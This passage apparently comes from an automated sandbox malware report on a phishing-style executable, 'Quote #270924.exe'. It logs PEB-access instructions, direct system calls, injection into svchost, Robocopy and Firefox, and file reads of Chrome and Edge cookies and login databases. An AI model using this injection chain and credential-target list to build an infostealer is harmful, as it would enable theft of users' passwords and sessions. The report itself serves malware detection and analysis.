            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]2_2_0302A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]2_2_0302C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F903E mov eax, dword ptr fs:[00000030h]2_2_030F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F903E mov eax, dword ptr fs:[00000030h]2_2_030F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F903E mov eax, dword ptr fs:[00000030h]2_2_030F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F903E mov eax, dword ptr fs:[00000030h]2_2_030F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]2_2_03032050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D705E mov ebx, dword ptr fs:[00000030h]2_2_030D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D705E mov eax, dword ptr fs:[00000030h]2_2_030D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305B052 mov eax, dword ptr fs:[00000030h]2_2_0305B052
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]2_2_030B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B106E mov eax, dword ptr fs:[00000030h]2_2_030B106E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03105060 mov eax, dword ptr fs:[00000030h]2_2_03105060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov ecx, dword ptr fs:[00000030h]2_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03041070 mov eax, dword ptr fs:[00000030h]2_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]2_2_0305C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD070 mov ecx, dword ptr fs:[00000030h]2_2_030AD070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]2_2_0303208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BD080 mov eax, dword ptr fs:[00000030h]2_2_030BD080
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BD080 mov eax, dword ptr fs:[00000030h]2_2_030BD080
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302D08D mov eax, dword ptr fs:[00000030h]2_2_0302D08D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03035096 mov eax, dword ptr fs:[00000030h]2_2_03035096
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305D090 mov eax, dword ptr fs:[00000030h]2_2_0305D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305D090 mov eax, dword ptr fs:[00000030h]2_2_0305D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306909C mov eax, dword ptr fs:[00000030h]2_2_0306909C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]2_2_030C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]2_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]2_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov ecx, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov ecx, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov ecx, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov ecx, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030470C0 mov eax, dword ptr fs:[00000030h]2_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031050D9 mov eax, dword ptr fs:[00000030h]2_2_031050D9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD0C0 mov eax, dword ptr fs:[00000030h]2_2_030AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AD0C0 mov eax, dword ptr fs:[00000030h]2_2_030AD0C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]2_2_030B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030590DB mov eax, dword ptr fs:[00000030h]2_2_030590DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030550E4 mov eax, dword ptr fs:[00000030h]2_2_030550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030550E4 mov ecx, dword ptr fs:[00000030h]2_2_030550E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0302A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]2_2_030380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]2_2_030B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]2_2_0302C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]2_2_030720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03037703 mov eax, dword ptr fs:[00000030h]2_2_03037703
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03035702 mov eax, dword ptr fs:[00000030h]2_2_03035702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03035702 mov eax, dword ptr fs:[00000030h]2_2_03035702
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]2_2_0306C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]2_2_03030710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]2_2_03060710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306F71F mov eax, dword ptr fs:[00000030h]2_2_0306F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306F71F mov eax, dword ptr fs:[00000030h]2_2_0306F71F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EF72E mov eax, dword ptr fs:[00000030h]2_2_030EF72E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03033720 mov eax, dword ptr fs:[00000030h]2_2_03033720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304F720 mov eax, dword ptr fs:[00000030h]2_2_0304F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304F720 mov eax, dword ptr fs:[00000030h]2_2_0304F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304F720 mov eax, dword ptr fs:[00000030h]2_2_0304F720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F972B mov eax, dword ptr fs:[00000030h]2_2_030F972B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310B73C mov eax, dword ptr fs:[00000030h]2_2_0310B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310B73C mov eax, dword ptr fs:[00000030h]2_2_0310B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310B73C mov eax, dword ptr fs:[00000030h]2_2_0310B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0310B73C mov eax, dword ptr fs:[00000030h]2_2_0310B73C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03029730 mov eax, dword ptr fs:[00000030h]2_2_03029730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03029730 mov eax, dword ptr fs:[00000030h]2_2_03029730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03065734 mov eax, dword ptr fs:[00000030h]2_2_03065734
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303973A mov eax, dword ptr fs:[00000030h]2_2_0303973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303973A mov eax, dword ptr fs:[00000030h]2_2_0303973A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]2_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]2_2_030AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03043740 mov eax, dword ptr fs:[00000030h]2_2_03043740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03043740 mov eax, dword ptr fs:[00000030h]2_2_03043740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03043740 mov eax, dword ptr fs:[00000030h]2_2_03043740
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]2_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]2_2_03030750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]2_2_030BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtAllocateVirtualMemory: Direct from: 0x76EF48EC
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtOpenSection: Direct from: 0x76EF2E0C
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtTerminateThread: Direct from: 0x76EF2FCC
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtWriteVirtualMemory: Direct from: 0x76EF2E3C
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtCreateMutant: Direct from: 0x76EF35CC
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtProtectVirtualMemory: Direct from: 0x76EE7B2E
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtReadFile: Direct from: 0x76EF2ADC
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtDelayExecution: Direct from: 0x76EF2DDC
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtResumeThread: Direct from: 0x76EF2FBC
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtCreateUserProcess: Direct from: 0x76EF371C
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtWriteVirtualMemory: Direct from: 0x76EF490C
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtSetInformationThread: Direct from: 0x76EE63F9
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtReadVirtualMemory: Direct from: 0x76EF2E8C
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Users\user\Desktop\Quote #270924.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\Robocopy.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\Robocopy.exe | Section loaded: NULL target: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe protection: read write
            Source: C:\Windows\SysWOW64\Robocopy.exe | Section loaded: NULL target: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\Robocopy.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\Robocopy.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\Robocopy.exe | Thread register set: target process: 7724
            Source: C:\Windows\SysWOW64\Robocopy.exe | Thread APC queued: target process: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe
            Source: C:\Users\user\Desktop\Quote #270924.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 3CA008
            Source: C:\Users\user\Desktop\Quote #270924.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Quote #270924.exe"
            Source: C:\Program Files (x86)\NHuuOIFvCiPFQibUqPiGsnnYLmnfQHCwDOqCxLWShlKuSgLUvc\HoiWfznxKU.exe | Process created: C:\Windows\SysWOW64\Robocopy.exe "C:\Windows\SysWOW64\Robocopy.exe"
            Source: C:\Windows\SysWOW64\Robocopy.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: HoiWfznxKU.exe, 00000003.00000000.2197791325.0000000001581000.00000002.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000003.00000002.3985732717.0000000001581000.00000002.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000000.2344426666.0000000001061000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
            Source: HoiWfznxKU.exe, 00000003.00000000.2197791325.0000000001581000.00000002.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000003.00000002.3985732717.0000000001581000.00000002.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000000.2344426666.0000000001061000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: HoiWfznxKU.exe, 00000003.00000000.2197791325.0000000001581000.00000002.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000003.00000002.3985732717.0000000001581000.00000002.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000000.2344426666.0000000001061000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: HoiWfznxKU.exe, 00000003.00000000.2197791325.0000000001581000.00000002.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000003.00000002.3985732717.0000000001581000.00000002.00000001.00040000.00000000.sdmp, HoiWfznxKU.exe, 00000006.00000000.2344426666.0000000001061000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: Quote #270924.exe | Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

            Stealing of Sensitive Information

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000004.00000002.3984885805.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2272902332.0000000000C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3985113849.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3986045977.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2275425308.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.3986013036.0000000002C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\Robocopy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\Robocopy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\Robocopy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\Robocopy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\Robocopy.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\Robocopy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\Robocopy.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\Robocopy.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\Robocopy.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000004.00000002.3984885805.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2272902332.0000000000C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3985113849.0000000002AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.3986045977.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
